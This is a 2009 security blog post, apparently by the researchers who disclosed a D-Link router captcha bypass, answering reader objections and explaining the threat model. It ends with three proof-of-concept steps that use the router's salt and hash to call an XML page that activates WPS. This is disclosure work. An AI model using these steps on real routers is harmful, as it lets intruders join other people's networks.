May 20th, 2009
A few sites have picked up on our D-Link captcha bypass post, and we’re seeing a lot of people who mis-understand the vulnerability, and the purpose of captchas in general. I’d like to address some of the comments that we’ve seen, and to clarify a few points:
[the captcha is] not really broken. It’s circumvented, but not broken.
Agreed; we’re still looking into some OCR engines that might be used to break the captcha completely. Perhaps a more fitting title would have been “D-Link Captcha Implementation Partially Broken”.
It turns out all that’s required to access the router’s setup page is the hash, so the feature provides an easy way for anyone within range to access the panel that controls all kinds of sensitive settings and contains the WPA password.
No, you cannot access the full router control panel with this vulnerability. Only a few pages (basically any XML page) honour authentication without captcha, one of which is the WPS activation page. Once WPS is activated, anyone within WiFi range can access the network, and then they can access the router control panel.
If you use a dictionary or simple alphanumerc passphrase then it can’t be brute forced unless they pass the CAPTCHA too.
Yes, it’s very annoying on web pages. But on a router page you might use once a month? It’s not such a bad idea.
Actually, if you look at the threat that the captcha is supposed to prevent, it is a terrible idea. A captcha does not provide security, it only attempts to prove that whoever performed a given HTTP request was a person. Yes, captchas may block automated attacks (assuming that the bot cannot break the captcha, which they have been known to do), but remember that the threat consists of a trojan running on the client’s PC that is used to attack the router. What’s stopping the malware from sending the image back to the attacker who can then read it and tell the trojan what it says? Yes, as shocking as it may seem, hackers are people too.
For this to work the attacker has to 1. be in your wifi range and 2. be wired into a pc on your lan i.e have a physical connection…Truth is, if you use the full length hexadecimal wpa2 key it will take a long, long time for anyone to crack your wifi.
To address first point, yes, the attacker does have to be within WiFi range; thankfully, it cannot be used to perform an entirely remote attack. I think it is important to keep in mind however, that besides the proximity requirement, a WiFi compromise is as dangerous (if not more so) than an attacker changing your router settings. Think about it; if he does get some malware on your PC, he only has access to one machine on the network, may not have sufficient permissions to do what he wants, and at the very least will have to upload a bunch of tools to your PC in order to propagate through the rest of your network. With your WPA key in hand, he can put as many of his own machines on your network as he wants.
Compromised web page is not wifi related, hence this is separate.
Technically, this is correct; there is no WiFi vulnerability per-se. However, the Web page vulnerability allows an attacker to bypass any WiFi security that you have in place, so I wouldn’t say that they are completely un-related.
most routers by default dont allow you to access the config from the WAN port, only if you are on the LAN
This is not a WAN issue. The attacker is in your browser or on your PC, which is on the LAN, hence, he has access to the router config page on the LAN side.
I thought most new routers require you to set them up properly to work and no longer “work out of the box” to prevent default password.
I wish! That actually would have been the proper response to such threats, had D-Link really wanted to make their routers more secure. To my knowledge, no consumer-grade router requires any type of configuration before they’ll work.
Honestly, If you have any advanced education you should be using OpenWRT or DDWRT and not the crap firmware in these routers.
Be careful what you wish for.
I would like to see a proof of concept. I do know that the salt hash is easily attainable in a txt file on the router.. however I forget the local url that retrieves it.
- Go to http://192.168.0.1/ and view the page source; locate the salt value (search the source for “salt”).
- Visit this URL: http://192.168.0.1/post_login.xml?hash=<insert the hash you calculated here>
- Visit this URL: http://192.168.0.1/wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0